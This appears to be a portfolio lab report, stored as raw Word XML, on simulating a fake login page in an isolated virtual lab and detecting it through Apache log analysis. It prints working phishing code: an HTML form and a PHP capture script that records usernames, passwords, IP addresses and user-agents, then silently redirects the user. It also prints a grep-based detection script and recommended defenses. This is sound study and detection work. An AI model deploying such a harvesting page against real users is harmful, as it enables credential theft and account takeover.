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40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated Credential Harvesting &amp; Detection Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Alpha — Isolated Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared as a self-directed learning / portfolio project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Date: July 31, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project simulates one of the most common initial-access techniques used in real-world attacks — credential harvesting via a fake login page — entirely within an isolated home lab, and pairs it with a detection script built from the defender's perspective. Unlike a technical vulnerability exploit, this project models a social-engineering-style attack: a convincing but fake login form that silently logs whatever a user submits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A dedicated web server was built from scratch (Debian, Apache, PHP) to host the simulated login page and a server-side capture script. Test submissions were captured successfully, including the submitting IP address, browser fingerprint, and credentials. A companion detection script was then developed to scan the web server's own access logs and flag exactly this pattern of activity, demonstrating both the offensive technique and a practical, low-cost defensive control against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8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Target/Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">webserver (192.168.56.40) — Debian 13, Apache 2.4, PHP 8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker/Test Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Kali Linux (192.168.56.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Isolated VirtualBox Internal Network ("intnet")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Project Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Simulated social-engineering attack + detection engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Real-World Risk Modeled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Critical (credential theft is a leading cause of real-world breaches)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Scope and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project was conducted entirely within a self-contained virtual lab. All systems involved were placed on a VirtualBox Internal Network with no route to any production network, host machine, real domain, or the internet. No real user data was collected at any point; all submitted credentials were fictitious test values entered by the author.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This distinction is important: the techniques demonstrated here — fake login pages that capture submitted data — constitute real phishing infrastructure when deployed against real domains or real users without their knowledge and consent. This project intentionally stayed confined to an isolated lab for that reason, and the same content was not deployed publicly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 In-Scope Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">webserver VM (192.168.56.40) — built from a minimal Debian install, running Apache and PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux VM (192.168.56.10) — used to submit test form data and simulate a victim's browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a web server from scratch and configure it for isolated lab use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Construct a simulated credential-harvesting login page and server-side capture logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate the capture mechanism using test submissions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Design and implement a log-based detection mechanism for this exact attack pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Document the technique, the evidence it leaves behind, and applicable defenses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Server Build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A new virtual machine was provisioned and installed with a minimal Debian distribution, deliberately separate from the existing Kali attacker VM to model a realistic two-machine scenario (attacker vs. target infrastructure). Apache and PHP were installed to provide a functional web hosting environment:</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 sudo apt install apache2 php libapache2-mod-php -y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The server was configured with a static IP address (192.168.56.40) on the lab's isolated internal network, persisted across reboots via /etc/network/interfaces, ensuring consistent reachability from the Kali test host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Building the Simulated Login Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A generic login form was created (login.html) that visually mimics a standard username/password authentication page. The form submits to a server-side script rather than performing any real authentication:</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&lt;form action="capture.php" method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  Username: &lt;input type="text" name="username"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  Password: &lt;input type="password" name="password"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input type="submit" value="Login"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The receiving script (capture.php) logs each submission — including the submitted username and password, the source IP address, and the browser's user-agent string — to a local file, then silently redirects the user back to the login page:</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$username = $_POST['username'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$password = $_POST['password'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$ip = $_SERVER['REMOTE_ADDR'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$ua = $_SERVER['HTTP_USER_AGENT'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">$entry = date('Y-m-d H:i:s') . " | IP: $ip | UA: $ua | Username: $username | Password: $password\n";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">file_put_contents('captured.txt', $entry, FILE_APPEND);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">header('Location: login.html');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This redirect-back-to-login behavior mirrors a real-world social engineering technique: rather than displaying an obvious error, the page simply appears to reject the login and invites the user to try again, reducing suspicion while the credentials are already captured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The page was tested by submitting fictitious credentials from the Kali host's browser. The capture file confirmed successful logging of all relevant data points:</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2026-07-31 18:55:37 | IP: 192.168.56.10 | UA: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 | Username: kali | Password: kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This confirms the mechanism captures not just credentials but useful attacker-side metadata (source IP and browser fingerprint) that could be used to profile victims in a real attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Attack Simulation: Credential Harvesting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8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Fake login page / credential harvesting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Real-World Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Social engineering, initial access (MITRE ATT&amp;CK T1566, T1598)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Data Captured</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">Username, password, source IP, browser user-agent, timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="E8E8E8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Detection Difficulty (undefended)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6960"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t xml:space="preserve">High — no technical vulnerability is exploited; the page functions exactly as designed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unlike the exploits documented in prior projects, this technique does not rely on any software vulnerability. It succeeds purely through deception: a user who cannot distinguish the fake page from a legitimate one will voluntarily submit their real credentials. This is precisely why credential harvesting remains one of the most common and effective initial-access techniques in real-world breaches, regardless of how well-patched an organization's systems are.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Detection Engineering: Log-Based Alerting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the defender's perspective, a custom bash script was developed to scan the web server's own Apache access log for POST requests to the capture endpoint, treating each as a flagged event:</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grep "POST /capture.php" "$LOGFILE" | while read -r line; do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    echo "[ALERT] $line"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run against the access log following the validation testing in Section 3.3, the script correctly identified every relevant request, including two failed attempts (HTTP 500 errors, generated during initial development) and the final successful capture (HTTP 302 redirect):</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[ALERT] 192.168.56.10 - - [31/Jul/2026:14:46:13 -0400] "POST /capture.php HTTP/1.1" 500 185 ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[ALERT] 192.168.56.10 - - [31/Jul/2026:14:50:37 -0400] "POST /capture.php HTTP/1.1" 500 185 ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[ALERT] 192.168.56.10 - - [31/Jul/2026:14:55:37 -0400] "POST /capture.php HTTP/1.1" 302 229 ...</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Total suspicious POSTs found: 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This demonstrates that even a simple, unauthenticated web server logs enough information by default to detect this attack pattern after the fact, provided someone is actually reviewing those logs or has automated alerting configured against them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Risk and Real-World Implications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Credential harvesting pages are typically the first stage of a larger attack chain: once an attacker captures valid credentials, they can be used for account takeover, lateral movement, or further social engineering (e.g., against colleagues of the compromised user). Because the technique requires no software exploitation, it bypasses most technical security controls entirely and instead targets human judgment, making user awareness the primary line of defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The detection method demonstrated here — log-based pattern matching — is a reactive, after-the-fact control. It confirms an incident occurred but does not prevent the initial credential submission. In a real environment, this would need to be paired with preventative and real-time controls, discussed below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Preventative Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User security awareness training focused on recognizing phishing pages, checking URLs/domains carefully, and reporting suspicious login prompts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce multi-factor authentication (MFA) on all accounts, so a captured password alone is insufficient for account takeover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy email and web filtering to block known phishing infrastructure and flag suspicious links before a user ever reaches the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a password manager with domain-matching autofill, which will not offer to fill credentials on a lookalike or unauthorized domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Detective Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Centralize web server logs into a SIEM or log aggregation platform and build automated alerting rules similar to the script demonstrated here, rather than relying on manual log review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Monitor for anomalous authentication patterns following any suspected credential exposure (e.g., logins from new locations or devices shortly after a flagged event).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extend the detection logic to flag repeated submissions from the same source IP within a short time window, which is a stronger indicator of automated or bulk credential testing than a single request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintain a documented incident response process for suspected credential compromise, including forced password resets and session invalidation for affected accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project demonstrated a complete simulated attack lifecycle from the opposite angle of prior projects in this portfolio: rather than exploiting a technical vulnerability, it modeled a social-engineering-based credential theft technique, then built a working log-based detection mechanism to catch it. Together, this shows both how easily a convincing fake login page can capture real credentials and useful attacker-side metadata, and how much of that activity is already visible in standard web server logs to a defender who is watching for it. All testing was conducted safely within an isolated virtual lab using only fictitious test data, with no real domain, real users, or production systems involved at any stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>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2026-07-31T19:38:44.009Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-31T19:38:44.085Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>